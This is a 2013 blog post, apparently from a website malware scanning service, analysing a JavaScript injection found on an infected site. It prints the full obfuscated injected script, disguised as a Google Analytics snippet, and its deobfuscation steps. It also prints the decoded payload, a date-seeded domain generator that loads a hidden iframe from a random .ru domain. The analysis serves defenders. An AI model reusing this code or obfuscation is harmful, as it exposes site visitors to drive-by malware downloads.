Friday, April 19, 2013

Malicious JavaScript generates hidden iframe to random .ru websites

Malicious JavaScript generates hidden iframe to random .ru domains

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website visitor. Upon accessing the infected website user's web browser downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Mon Apr 15 22:50:26 2013
Infected website's files: 1 
Website malware scan report link: http://goo.gl/kTFgw
Pastebin: http://pastebin.com/Tg8pY5mi


Website malware scanner report




Malicious JavaScript injection



Threat dump:

[[
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
/*km0ae9gr6m*/window.eval(String.fromCharCode(105,61,48,59,116,114,121,123,112,114,111,116,111,116,121,112,101,45,53,59,125,99,97,116,99,104,40,122,41,123,102,61,91,49,48,50,44,50,51,52,44,49,49,48,44,49,57,56,44,49,49,54,44,50,49,48,44,49,49,49,44,50,50,48,44,51,50,44,50,50,48,44,49,48,49,44,50,52,48,44,49,49,54,44,49,54,52,44,57,55,44,50,50,48,44,49,48,48,44,50,50,50,44,49,48,57,44,49,53,54,44,49,49,55,44,50,49,56,44,57,56,44,50,48,50,44,49,49,52,44,56,48,44,52,49,44,50,52,54,44,49,49,56,44,49,57,52,44,49,49,52,44,54,52,44,49,48,52,44,50,49,48,44,54,49,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,49,49,53,44,50,48,50,44,49,48,49,44,50,48,48,44,52,55,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,56,49,44,49,49,56,44,49,49,56,44,49,57,52,44,49,49,52,44,54,52,44,49,48,56,44,50,50,50,44,54,49,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,49,49,53,44,50,48,50,44,49,48,49,44,50,48,48,44,51,55,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,56,49,44,49,49,56,44,49,49,56,44,49,57,52,44,49,49,52,44,54,52,44,49,49,54,44,50,48,50,44,49,49,53,44,50,51,50,44,54,49,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,54,53,44,56,52,44,49,48,56,44,50,50,50,44,52,53,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,56,50,44,56,52,44,49,48,52,44,50,49,48,44,53,57,44,50,49,48,44,49,48,50,44,56,48,44,49,49,54,44,50,48,50,44,49,49,53,44,50,51,50,44,54,50,44,57,54,44,52,49,44,50,52,54,44,49,49,54,44,50,48,56,44,49,48,53,44,50,51,48,44,52,54,44,50,51,48,44,49,48,49,44,50,48,50,44,49,48,48,44,49,50,50,44,49,49,54,44,50,48,50,44,49,49,53,44,50,51,50,44,49,50,53,44,50,48,50,44,49,48,56,44,50,51,48,44,49,48,49,44,50,52,54,44,49,49,54,44,50,48,56,44,49,48,53,44,50,51,48,44,52,54,44,50,51,48,44,49,48,49,44,50,48,50,44,49,48,48,44,49,50,50,44,49,49,54,44,50,48,50,44,49,49,53,44,50,51,50,44,52,51,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,55,55,44,50,53,48,44,49,49,52,44,50,48,50,44,49,49,54,44,50,51,52,44,49,49,52,44,50,50,48,44,52,48,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,49,49,53,44,50,48,50,44,49,48,49,44,50,48,48,44,52,50,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,49,49,49,44,50,50,48,44,49,48,49,44,49,53,56,44,49,49,56,44,50,48,50,44,49,49,52,44,49,53,52,44,52,49,44,50,53,48,44,49,48,50,44,50,51,52,44,49,49,48,44,49,57,56,44,49,49,54,44,50,49,48,44,49,49,49,44,50,50,48,44,51,50,44,49,54,52,44,57,55,44,50,50,48,44,49,48,48,44,50,50,50,44,49,48,57,44,49,53,54,44,49,49,55,44,50,49,56,44,57,56,44,50,48,50,44,49,49,52,44,49,52,50,44,49,48,49,44,50,50,48,44,49,48,49,44,50,50,56,44,57,55,44,50,51,50,44,49,49,49,44,50,50,56,44,52,48,44,50,51,52,44,49,49,48,44,50,49,48,44,49,50,48,44,56,50,44,49,50,51,44,50,51,54,44,57,55,44,50,50,56,44,51,50,44,50,48,48,44,54,49,44,50,50,48,44,49,48,49,44,50,51,56,44,51,50,44,49,51,54,44,57,55,44,50,51,50,44,49,48,49,44,56,48,44,49,49,55,44,50,50,48,44,49,48,53,44,50,52,48,44,52,50,44,57,56,44,52,56,44,57,54,44,52,56,44,56,50,44,53,57,44,50,51,54,44,57,55,44,50,50,56,44,51,50,44,50,51,48,44,54,49,44,50,48,48,44,52,54,44,50,48,54,44,49,48,49,44,50,51,50,44,55,50,44,50,50,50,44,49,49,55,44,50,50,56,44,49,49,53,44,56,48,44,52,49,44,49,50,52,44,52,57,44,49,48,48,44,54,51,44,57,56,44,53,56,44,57,54,44,53,57,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,49,49,53,44,50,48,50,44,49,48,49,44,50,48,48,44,54,49,44,49,48,48,44,53,49,44,49,48,52,44,53,51,44,49,48,56,44,53,53,44,49,49,50,44,53,55,44,57,54,44,52,57,44,56,54,44,52,48,44,50,48,48,44,52,54,44,50,48,54,44,49,48,49,44,50,51,50,44,55,55,44,50,50,50,44,49,49,48,44,50,51,50,44,49,48,52,44,56,48,44,52,49,44,56,52,44,52,56,44,50,52,48,44,55,48,44,49,52,48,44,55,48,44,49,52,48,44,55,48,44,49,52,48,44,52,49,44,56,54,44,52,48,44,50,48,48,44,52,54,44,50,48,54,44,49,48,49,44,50,51,50,44,54,56,44,49,57,52,44,49,49,54,44,50,48,50,44,52,48,44,56,50,44,52,50,44,57,54,44,49,50,48,44,49,52,48,44,55,48,44,49,52,48,44,55,48,44,56,50,44,52,51,44,56,48,44,55,55,44,49,57,52,44,49,49,54,44,50,48,56,44,52,54,44,50,50,56,44,49,49,49,44,50,51,52,44,49,49,48,44,50,48,48,44,52,48,44,50,51,48,44,52,50,44,57,54,44,49,50,48,44,49,52,48,44,55,48,44,49,52,48,44,52,49,44,56,50,44,53,57,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,54,53,44,49,50,50,44,53,50,44,49,49,50,44,53,48,44,49,49,48,44,52,57,44,49,49,56,44,49,49,54,44,50,48,56,44,49,48,53,44,50,51,48,44,52,54,44,49,53,52,44,54,49,44,49,48,48,44,52,57,44,49,48,52,44,53,53,44,49,48,52,44,53,54,44,49,48,50,44,53,52,44,49,48,52,44,53,53,44,49,49,56,44,49,49,54,44,50,48,56,44,49,48,53,44,50,51,48,44,52,54,44,49,54,50,44,54,49,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,55,55,44,57,52,44,49,49,54,44,50,48,56,44,49,48,53,44,50,51,48,44,52,54,44,49,51,48,44,53,57,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,56,50,44,49,50,50,44,49,49,54,44,50,48,56,44,49,48,53,44,50,51,48,44,52,54,44,49,53,52,44,51,55,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,54,53,44,49,49,56,44,49,49,54,44,50,48,56,44,49,48,53,44,50,51,48,44,52,54,44,50,50,50,44,49,49,48,44,50,48,50,44,55,57,44,50,51,54,44,49,48,49,44,50,50,56,44,55,55,44,49,50,50,44,52,57,44,57,50,44,52,56,44,57,52,44,49,49,54,44,50,48,56,44,49,48,53,44,50,51,48,44,52,54,44,49,53,52,44,53,57,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,57,50,44,49,49,48,44,50,48,50,44,49,50,48,44,50,51,50,44,54,49,44,50,50,48,44,49,48,49,44,50,52,48,44,49,49,54,44,49,54,52,44,57,55,44,50,50,48,44,49,48,48,44,50,50,50,44,49,48,57,44,49,53,54,44,49,49,55,44,50,49,56,44,57,56,44,50,48,50,44,49,49,52,44,49,49,56,44,49,49,52,44,50,48,50,44,49,49,54,44,50,51,52,44,49,49,52,44,50,50,48,44,51,50,44,50,51,50,44,49,48,52,44,50,49,48,44,49,49,53,44,50,53,48,44,49,48,50,44,50,51,52,44,49,49,48,44,49,57,56,44,49,49,54,44,50,49,48,44,49,49,49,44,50,50,48,44,51,50,44,49,57,56,44,49,49,52,44,50,48,50,44,57,55,44,50,51,50,44,49,48,49,44,49,54,52,44,57,55,44,50,50,48,44,49,48,48,44,50,50,50,44,49,48,57,44,49,53,54,44,49,49,55,44,50,49,56,44,57,56,44,50,48,50,44,49,49,52,44,56,48,44,49,49,52,44,56,56,44,55,55,44,50,49,48,44,49,49,48,44,56,56,44,55,55,44,49,57,52,44,49,50,48,44,56,50,44,49,50,51,44,50,50,56,44,49,48,49,44,50,51,50,44,49,49,55,44,50,50,56,44,49,49,48,44,54,52,44,55,55,44,49,57,52,44,49,49,54,44,50,48,56,44,52,54,44,50,50,56,44,49,49,49,44,50,51,52,44,49,49,48,44,50,48,48,44,52,48,44,56,48,44,55,55,44,49,57,52,44,49,50,48,44,57,48,44,55,55,44,50,49,48,44,49,49,48,44,56,50,44,52,50,44,50,50,56,44,52,54,44,50,50,48,44,49,48,49,44,50,52,48,44,49,49,54,44,56,48,44,52,49,44,56,54,44,55,55,44,50,49,48,44,49,49,48,44,56,50,44,49,50,53,44,50,48,52,44,49,49,55,44,50,50,48,44,57,57,44,50,51,50,44,49,48,53,44,50,50,50,44,49,49,48,44,54,52,44,49,48,51,44,50,48,50,44,49,49,48,44,50,48,50,44,49,49,52,44,49,57,52,44,49,49,54,44,50,48,50,44,56,48,44,50,51,48,44,49,48,49,44,50,51,52,44,49,48,48,44,50,50,50,44,56,50,44,49,57,52,44,49,49,48,44,50,48,48,44,49,49,49,44,50,49,56,44,56,51,44,50,51,50,44,49,49,52,44,50,49,48,44,49,49,48,44,50,48,54,44,52,48,44,50,51,52,44,49,49,48,44,50,49,48,44,49,50,48,44,56,56,44,49,48,56,44,50,48,50,44,49,49,48,44,50,48,54,44,49,49,54,44,50,48,56,44,52,52,44,50,52,52,44,49,49,49,44,50,50,48,44,49,48,49,44,56,50,44,49,50,51,44,50,51,54,44,57,55,44,50,50,56,44,51,50,44,50,50,56,44,57,55,44,50,50,48,44,49,48,48,44,49,50,50,44,49,49,48,44,50,48,50,44,49,49,57,44,54,52,44,56,50,44,49,57,52,44,49,49,48,44,50,48,48,44,49,49,49,44,50,49,56,44,55,56,44,50,51,52,44,49,48,57,44,49,57,54,44,49,48,49,44,50,50,56,44,55,49,44,50,48,50,44,49,49,48,44,50,48,50,44,49,49,52,44,49,57,52,44,49,49,54,44,50,50,50,44,49,49,52,44,56,48,44,49,49,55,44,50,50,48,44,49,48,53,44,50,52,48,44,52,49,44,49,49,56,44,49,49,56,44,49,57,52,44,49,49,52,44,54,52,44,49,48,56,44,50,48,50,44,49,49,54,44,50,51,50,44,49,48,49,44,50,50,56,44,49,49,53,44,49,50,50,44,57,49,44,55,56,44,57,55,44,55,56,44,52,52,44,55,56,44,57,56,44,55,56,44,52,52,44,55,56,44,57,57,44,55,56,44,52,52,44,55,56,44,49,48,48,44,55,56,44,52,52,44,55,56,44,49,48,49,44,55,56,44,52,52,44,55,56,44,49,48,50,44,55,56,44,52,52,44,55,56,44,49,48,51,44,55,56,44,52,52,44,55,56,44,49,48,52,44,55,56,44,52,52,44,55,56,44,49,48,53,44,55,56,44,52,52,44,55,56,44,49,48,54,44,55,56,44,52,52,44,55,56,44,49,48,55,44,55,56,44,52,52,44,55,56,44,49,48,56,44,55,56,44,52,52,44,55,56,44,49,48,57,44,55,56,44,52,52,44,55,56,44,49,49,48,44,55,56,44,52,52,44,55,56,44,49,49,49,44,55,56,44,52,52,44,55,56,44,49,49,50,44,55,56,44,52,52,44,55,56,44,49,49,51,44,55,56,44,52,52,44,55,56,44,49,49,52,44,55,56,44,52,52,44,55,56,44,49,49,53,44,55,56,44,52,52,44,55,56,44,49,49,54,44,55,56,44,52,52,44,55,56,44,49,49,55,44,55,56,44,52,52,44,55,56,44,49,49,56,44,55,56,44,52,52,44,55,56,44,49,49,57,44,55,56,44,52,52,44,55,56,44,49,50,48,44,55,56,44,52,52,44,55,56,44,49,50,49,44,55,56,44,52,52,44,55,56,44,49,50,50,44,55,56,44,57,51,44,49,49,56,44,49,49,56,44,49,57,52,44,49,49,52,44,54,52,44,49,49,53,44,50,51,50,44,49,49,52,44,49,50,50,44,51,57,44,55,56,44,53,57,44,50,48,52,44,49,49,49,44,50,50,56,44,52,48,44,50,51,54,44,57,55,44,50,50,56,44,51,50,44,50,49,48,44,54,49,44,57,54,44,53,57,44,50,49,48,44,54,48,44,50,49,54,44,49,48,49,44,50,50,48,44,49,48,51,44,50,51,50,44,49,48,52,44,49,49,56,44,49,48,53,44,56,54,44,52,51,44,56,50,44,49,50,51,44,50,51,48,44,49,49,54,44,50,50,56,44,52,51,44,49,50,50,44,49,48,56,44,50,48,50,44,49,49,54,44,50,51,50,44,49,48,49,44,50,50,56,44,49,49,53,44,49,56,50,44,57,57,44,50,50,56,44,49,48,49,44,49,57,52,44,49,49,54,44,50,48,50,44,56,50,44,49,57,52,44,49,49,48,44,50,48,48,44,49,49,49,44,50,49,56,44,55,56,44,50,51,52,44,49,48,57,44,49,57,54,44,49,48,49,44,50,50,56,44,52,48,44,50,50,56,44,57,55,44,50,50,48,44,49,48,48,44,56,56,44,52,56,44,56,56,44,49,48,56,44,50,48,50,44,49,49,54,44,50,51,50,44,49,48,49,44,50,50,56,44,49,49,53,44,57,50,44,49,48,56,44,50,48,50,44,49,49,48,44,50,48,54,44,49,49,54,44,50,48,56,44,52,53,44,57,56,44,52,49,44,49,56,54,44,49,50,53,44,50,50,56,44,49,48,49,44,50,51,50,44,49,49,55,44,50,50,56,44,49,49,48,44,54,52,44,49,49,53,44,50,51,50,44,49,49,52,44,56,54,44,51,57,44,57,50,44,51,57,44,56,54,44,49,50,50,44,50,50,50,44,49,49,48,44,50,48,50,44,49,50,53,44,50,51,48,44,49,48,49,44,50,51,50,44,56,52,44,50,49,48,44,49,48,57,44,50,48,50,44,49,49,49,44,50,51,52,44,49,49,54,44,56,48,44,49,48,50,44,50,51,52,44,49,49,48,44,49,57,56,44,49,49,54,44,50,49,48,44,49,49,49,44,50,50,48,44,52,48,44,56,50,44,49,50,51,44,50,51,50,44,49,49,52,44,50,52,50,44,49,50,51,44,50,49,48,44,49,48,50,44,56,48,44,49,49,54,44,50,52,50,44,49,49,50,44,50,48,50,44,49,49,49,44,50,48,52,44,51,50,44,50,49,48,44,49,48,50,44,50,50,56,44,57,55,44,50,49,56,44,49,48,49,44,49,55,52,44,57,55,44,50,51,48,44,54,55,44,50,50,56,44,49,48,49,44,49,57,52,44,49,49,54,44,50,48,50,44,49,48,48,44,49,48,48,44,54,49,44,49,50,50,44,51,52,44,50,51,52,44,49,49,48,44,50,48,48,44,49,48,49,44,50,48,52,44,49,48,53,44,50,50,48,44,49,48,49,44,50,48,48,44,51,52,44,56,50,44,49,50,51,44,50,49,48,44,49,48,50,44,50,50,56,44,57,55,44,50,49,56,44,49,48,49,44,49,55,52,44,57,55,44,50,51,48,44,54,55,44,50,50,56,44,49,48,49,44,49,57,52,44,49,49,54,44,50,48,50,44,49,48,48,44,49,48,48,44,54,49,44,50,51,50,44,49,49,52,44,50,51,52,44,49,48,49,44,49,49,56,44,49,49,56,44,49,57,52,44,49,49,52,44,54,52,44,49,49,55,44,50,50,48,44,49,48,53,44,50,52,48,44,54,49,44,49,53,52,44,57,55,44,50,51,50,44,49,48,52,44,57,50,44,49,49,52,44,50,50,50,44,49,49,55,44,50,50,48,44,49,48,48,44,56,48,44,52,51,44,50,50,48,44,49,48,49,44,50,51,56,44,51,50,44,49,51,54,44,57,55,44,50,51,50,44,49,48,49,44,56,48,44,52,49,44,57,52,44,52,57,44,57,54,44,52,56,44,57,54,44,52,49,44,49,49,56,44,49,49,56,44,49,57,52,44,49,49,52,44,54,52,44,49,48,48,44,50,50,50,44,49,48,57,44,49,57,52,44,49,48,53,44,50,50,48,44,55,56,44,49,57,52,44,49,48,57,44,50,48,50,44,54,49,44,50,48,54,44,49,48,49,44,50,50,48,44,49,48,49,44,50,50,56,44,57,55,44,50,51,50,44,49,48,49,44,49,54,48,44,49,49,53,44,50,48,50,44,49,49,55,44,50,48,48,44,49,49,49,44,49,54,52,44,57,55,44,50,50,48,44,49,48,48,44,50,50,50,44,49,48,57,44,49,54,54,44,49,49,54,44,50,50,56,44,49,48,53,44,50,50,48,44,49,48,51,44,56,48,44,49,49,55,44,50,50,48,44,49,48,53,44,50,52,48,44,52,52,44,57,56,44,53,52,44,56,56,44,51,57,44,50,50,56,44,49,49,55,44,55,56,44,52,49,44,49,49,56,44,49,48,53,44,50,48,52,44,49,49,52,44,50,49,56,44,54,49,44,50,48,48,44,49,49,49,44,49,57,56,44,49,49,55,44,50,49,56,44,49,48,49,44,50,50,48,44,49,49,54,44,57,50,44,57,57,44,50,50,56,44,49,48,49,44,49,57,52,44,49,49,54,44,50,48,50,44,54,57,44,50,49,54,44,49,48,49,44,50,49,56,44,49,48,49,44,50,50,48,44,49,49,54,44,56,48,44,51,52,44,49,52,54,44,55,48,44,49,54,52,44,54,53,44,49,53,52,44,54,57,44,54,56,44,52,49,44,49,49,56,44,49,48,53,44,50,48,52,44,49,49,52,44,50,49,56,44,52,54,44,50,51,48,44,49,48,49,44,50,51,50,44,54,53,44,50,51,50,44,49,49,54,44,50,50,56,44,49,48,53,44,49,57,54,44,49,49,55,44,50,51,50,44,49,48,49,44,56,48,44,51,52,44,50,51,48,44,49,49,52,44,49,57,56,44,51,52,44,56,56,44,51,52,44,50,48,56,44,49,49,54,44,50,51,50,44,49,49,50,44,49,49,54,44,52,55,44,57,52,44,51,52,44,56,54,44,49,48,48,44,50,50,50,44,49,48,57,44,49,57,52,44,49,48,53,44,50,50,48,44,55,56,44,49,57,52,44,49,48,57,44,50,48,50,44,52,51,44,54,56,44,52,55,44,50,50,56,44,49,49,55,44,50,50,48,44,49,48,50,44,50,50,50,44,49,49,52,44,50,48,50,44,49,49,53,44,50,51,50,44,49,49,52,44,50,51,52,44,49,49,48,44,49,50,54,44,49,49,53,44,50,49,48,44,49,48,48,44,49,50,50,44,57,57,44,50,52,48,44,51,52,44,56,50,44,53,57,44,50,49,48,44,49,48,50,44,50,50,56,44,49,48,57,44,57,50,44,49,49,53,44,50,51,50,44,49,50,49,44,50,49,54,44,49,48,49,44,57,50,44,49,49,57,44,50,49,48,44,49,48,48,44,50,51,50,44,49,48,52,44,49,50,50,44,51,52,44,57,54,44,49,49,50,44,50,52,48,44,51,52,44,49,49,56,44,49,48,53,44,50,48,52,44,49,49,52,44,50,49,56,44,52,54,44,50,51,48,44,49,49,54,44,50,52,50,44,49,48,56,44,50,48,50,44,52,54,44,50,48,56,44,49,48,49,44,50,49,48,44,49,48,51,44,50,48,56,44,49,49,54,44,49,50,50,44,51,52,44,57,54,44,49,49,50,44,50,52,48,44,51,52,44,49,49,56,44,49,48,53,44,50,48,52,44,49,49,52,44,50,49,56,44,52,54,44,50,51,48,44,49,49,54,44,50,52,50,44,49,48,56,44,50,48,50,44,52,54,44,50,51,54,44,49,48,53,44,50,51,48,44,49,48,53,44,49,57,54,44,49,48,53,44,50,49,54,44,49,48,53,44,50,51,50,44,49,50,49,44,49,50,50,44,51,52,44,50,48,56,44,49,48,53,44,50,48,48,44,49,48,48,44,50,48,50,44,49,49,48,44,54,56,44,53,57,44,50,48,48,44,49,49,49,44,49,57,56,44,49,49,55,44,50,49,56,44,49,48,49,44,50,50,48,44,49,49,54,44,57,50,44,57,56,44,50,50,50,44,49,48,48,44,50,52,50,44,52,54,44,49,57,52,44,49,49,50,44,50,50,52,44,49,48,49,44,50,50,48,44,49,48,48,44,49,51,52,44,49,48,52,44,50,49,48,44,49,48,56,44,50,48,48,44,52,48,44,50,49,48,44,49,48,50,44,50,50,56,44,49,48,57,44,56,50,44,49,50,53,44,50,53,48,44,57,57,44,49,57,52,44,49,49,54,44,49,57,56,44,49,48,52,44,56,48,44,49,48,49,44,56,50,44,49,50,51,44,50,53,48,44,49,50,53,44,56,56,44,53,51,44,57,54,44,52,56,44,56,50,44,53,57,93,59,118,61,34,101,34,43,34,118,34,43,34,97,34,59,125,105,102,40,118,41,101,61,119,105,110,100,111,119,91,118,43,34,108,34,93,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,98,34,41,59,105,102,40,101,41,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43,34,34,41,59,125,99,97,116,99,104,40,102,119,98,101,119,101,41,123,119,61,102,59,115,61,91,93,59,125,13,10,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,51,51,51,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,46,102,114,111,109,67,104,97,114,67,111,100,101,40,40,119,91,106,93,47,40,50,45,49,43,106,37,50,41,41,41,59,125,13,10,105,102,40,102,41,101,40,115,41,59));/*qhk6sa6g1c*/]]


Malware entry


Malware entry details.

Beautified script


  1. var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
  2. document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
  3. window.eval(String.fromCharCode(105, 61, 48, 59, 116, 114, 121, 123, 112, 114, 111, 116, 111, 116, 121, 112, 101,45, 53, 59, 125, 99, 97, 116, 99, 104, 40, 122, 41, 123, 102, 61, 91, 49, 48, 50, 44, ... 116, 114, 121, 123, 113,61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40,34, 98, 34, 41, 59, 105, 102, 40, 101, 41, 113, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 113,43, 34, 34, 41, 59, 125, 99, 97, 116, 99, 104, 40, 102, 119, 98, 101, 119, 101, 41, 123, 119, 61, 102, 59, 115,61, 91, 93, 59, 125, 13, 10, 114, 61, 83, 116, 114, 105, 110, 103, 59, 122, 61, 40, 40, 101, 41, 63, 34, 67, 111,100, 101, 34, 58, 34, 34, 41, 59, 102, 111, 114, 40, 59, 49, 51, 51, 51, 45, 53, 43, 53, 62, 105, 59, 105, 43, 61,49, 41, 123, 106, 61, 105, 59, 105, 102, 40, 101, 41, 115, 61, 115, 43, 114, 46, 102, 114, 111, 109, 67, 104, 97,114, 67, 111, 100, 101, 40, 40, 119, 91, 106, 93, 47, 40, 50, 45, 49, 43, 106, 37, 50, 41, 41, 41, 59, 125, 13,10, 105, 102, 40, 102, 41, 101, 40, 115, 41, 59));


Second level of decryption


  1. = 0;
  2. try {
  3.     prototype - 5;
  4. } catch (z) {
  5.     f = [102, 234, 110, 198, 116, 210, 111, 220, 32, 220, 101, 240, 116, 164, 97, 220, 100, 222, 109, ... 210,108, 200, 40, 210, 102, 228, 109, 82, 125, 250, 99, 194, 116, 198, 104, 80, 101, 82, 123, 250, 125, 88, 53, 96,48, 82, 59];
  6.     v = "e" + "v" + "a";
  7. }
  8. if (v) e = window[+ "l"];
  9. try {
  10.     q = document.createElement("b");
  11.     if (e) q.appendChild(+ "");
  12. } catch (fwbewe) {
  13.     w = f;
  14.     s = [];
  15. }
  17. = String;
  18. = ((e) ? "Code" : "");
  19. for (; 1333 - 5 + 5 > i; i += 1) {
  20.     j = i;
  21.     if (e) s = s + r.fromCharCode((w[j] / (2 - 1 + j % 2)));
  22. }
  23. if (f) e(s);


Simplified version of malicious code


  1. = "";
  2. = 0;
  3. = [102, 234, 110, 198, 116, 210, 111, 220, 32, 220, 101, 240, 116, 164, 97, 2....];
  4. for (; 1333 - 5 + 5 > i; i += 1) { s = s + String.fromCharCode((f[i] / (2 - 1 + i % 2)));}
  5. eval(s);  


Malicious payload

Decoded payload generates script that creates hidden iframes to random domains in *.ru e.g http://<random-domain-name>.ru/runforestrun?sid=cx
Each time to new malicious domain.


  1. function nextRandomNumber() {
  2.     var hi = this.seed / this.Q;
  3.     var lo = this.seed % this.Q;
  4.     var test = this.A * lo - this.R * hi;
  5.     if (test > 0) {
  6.         this.seed = test
  7.     } else {
  8.         this.seed = test + this.M
  9.     }
  10.     return (this.seed * this.oneOverM)
  11. }
  12. function RandomNumberGenerator(unix) {
  13.     var d = new Date(unix * 1000);
  14.     var s = d.getHours() > 12 ? 1 : 0;
  15.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(* 0xFFF));
  16.     this.A = 48271;
  17.     this.M = 2147483647;
  18.     this.Q = this.M / this.A;
  19.     this.R = this.M % this.A;
  20.     this.oneOverM = 1.0 / this.M;
  21.     this.next = nextRandomNumber;
  22.     return this
  23. }
  24. function createRandomNumber(r, Min, Max) {
  25.     return Math.round((Max - Min) * r.next() + Min)
  26. }
  27. function generatePseudoRandomString(unix, length, zone) {
  28.     var rand = new RandomNumberGenerator(unix);
  29.     var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's','t', 'u', 'v', 'w', 'x', 'y', 'z'];
  30.     var str = '';
  31.     for (var i = 0; i < length; i++) {
  32.         str += letters[createRandomNumber(rand, 0, letters.length - 1)]
  33.     }
  34.     return str + '.' + zone
  35. }
  36. setTimeout(function () {
  37.     try {
  38.         if (typeof iframeWasCreated2 == "undefined") {
  39.             iframeWasCreated2 = true;
  40.             var unix = Math.round(+new Date() / 1000);
  41.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
  42.             ifrm = document.createElement("IFRAME");
  43.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx");
  44.             ifrm.style.width = "0px";
  45.             ifrm.style.height = "0px";
  46.             ifrm.style.visibility = "hidden";
  47.             document.body.appendChild(ifrm)
  48.         }
  49.     } catch (e) {}
  50. }, 500);



Blacklisting status


The website is Suspicious on Google Safe Browsing.



Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
Posted by at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)